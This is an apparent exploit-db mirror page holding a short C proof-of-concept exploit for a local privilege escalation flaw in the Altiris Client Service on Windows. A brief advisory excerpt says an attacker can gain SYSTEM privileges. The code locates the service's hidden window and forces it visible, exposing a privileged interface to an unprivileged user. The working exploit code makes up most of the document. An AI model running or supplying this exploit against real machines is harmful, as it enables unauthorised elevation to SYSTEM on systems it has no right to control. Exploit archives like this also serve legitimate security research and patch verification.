exploit-db-mirror/exploits/windows/local/25554.c
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

29 lines
No EOL
786 B
C

// source: https://www.securityfocus.com/bid/13409/info
A local privilege escalation vulnerability affects the Altiris Client Service. This issue is due to a failure of the application to properly secure access to privileged interfaces.
An attacker may leverage this issue to gain SYSTEM level privileges on an affected computer.
#include <stdio.h>
#include <windows.h>
int main( void )
{
HWND hWnd;
char szWindowName[] = "Altiris Client Service";
printf( "Finding window %s\n", szWindowName );
hWnd = FindWindow( NULL, szWindowName );
if ( hWnd == NULL )
{
printf( "ERROR! Could not find window %s\n", szWindowName );
exit( 1 );
}
ShowWindow( hWnd, SW_SHOW );
return 0;
}